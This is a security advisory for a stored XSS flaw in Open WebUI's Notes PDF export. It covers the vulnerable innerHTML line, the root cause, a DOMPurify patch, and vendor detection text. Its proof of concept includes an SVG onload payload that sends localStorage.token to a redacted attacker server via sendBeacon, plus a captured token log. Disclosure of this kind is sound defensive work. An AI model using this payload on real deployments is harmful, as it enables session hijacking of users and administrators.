GHSA-8wvc-869r-xfqf
HIGHOpen WebUI Vulnerable to Stored DOM XSS via Note 'Download PDF'
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.
open-webuinpmDescription
Summary
A Stored XSS vulnerability has been discovered in Open-WebUI's Notes PDF download functionality. An attacker can import a Markdown file containing malicious SVG tags into Notes, allowing them to execute arbitrary JavaScript code and steal session tokens when a victim downloads the note as PDF.
This vulnerability can be exploited by any authenticated user, and unauthenticated external attackers can steal session tokens from users (both admin and regular users) by sharing specially crafted markdown files.
Details
Vulnerability Location
File: src/lib/components/notes/utils.ts
Function: downloadPdf()
Vulnerable Code (Line 35):
const contentNode = document.createElement('div');
contentNode.innerHTML = html; // Direct assignment without DOMPurify sanitization
node.appendChild(contentNode);
document.body.appendChild(node);
Root Cause
-
Incomplete TipTap Editor Configuration
- Open-WebUI only uses TipTap StarterKit
- No Schema definition for dangerous tags like SVG, Script
- Unknown HTML tags are stored as raw HTML
-
Missing Sanitization During PDF Generation
note.data.content.htmlis directly assigned toinnerHTML- No DOMPurify or other sanitization
- Stored malicious HTML executes as-is
PoC
Environment
- Open-WebUI latest version (v0.6.36)
- Admin account
Step 1: Create Malicious Markdown File
Filename: token_stealer.md
<svg onload="navigator.sendBeacon('https://redacted/steal',localStorage.token)"></svg>
navigator.sendBeacon() was used to bypass CORS.
Step 2: Import to Notes
- Login to Open-WebUI
- Click "Notes" in the left menu
- Drag and drop the Markdown file
- Note is automatically created
Step 3: Trigger PDF Download
- Access Notes menu (/notes)
- Click ⋯ on the right side of the uploaded note
- Select "Download" → "PDF document (.pdf)"
- JavaScript executes
Step 4: Verify Token Theft
Attacker's server log:
POST /steal HTTP/1.1
Host: redacted
Content-Type: text/plain;charset=UTF-8
Content-Length: 145
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjVkMjE4ZmU4LTU2MTktNGEzNS05MWZkLTM2MzA3NDU1NGFkNCJ9.zOicE5c5FJ3ZOc9j6T2xHU-K6dbz-s1ib_hIG4LayFw
And Simple PoC alert(1)
Filename: simple_poc.md
<svg onload="alert(1)"></svg>
Impact
CVSS 3.1 Score: 8.7 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
Vulnerability Type
CWE-79: Cross-site Scripting (XSS)
CWE-116: Improper Encoding or Escaping of Output
Affected Users
- All Open-WebUI users
- Especially users utilizing the Notes feature
Attack Scenario
1. Attacker shares malicious note (.md file) in the community
2. Victim uploads the shared note (.md file)
3. Victim downloads as PDF
4. XSS vulnerability triggers
5. Victim's session (localStorage.token) is stolen
Recommended Patch
// src/lib/components/notes/utils.ts:35
import DOMPurify from 'dompurify';
const contentNode = document.createElement('div');
// Sanitize with DOMPurify
contentNode.innerHTML = DOMPurify.sanitize(html, {
ALLOWED_TAGS: [
'p', 'br', 'strong', 'em', 'u', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
'ul', 'ol', 'li', 'a', 'code', 'pre', 'blockquote', 'table', 'thead',
'tbody', 'tr', 'td', 'th'
],
ALLOWED_ATTR: ['href', 'class', 'target'],
FORBID_TAGS: ['svg', 'script', 'iframe', 'object', 'embed', 'style'],
FORBID_ATTR: ['onload', 'onerror', 'onclick', 'onmouseover', 'onfocus'],
ALLOW_DATA_ATTR: false
});
node.appendChild(contentNode);
References
- OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
- DOMPurify: https://github.com/cure53/DOMPurify
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | open-webui | all versions | 0.6.37 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for open-webui. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update open-webui to 0.6.37 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-8wvc-869r-xfqf is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-8wvc-869r-xfqf is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-8wvc-869r-xfqf. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-8wvc-869r-xfqf in your dependencies?
O3 detects GHSA-8wvc-869r-xfqf across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.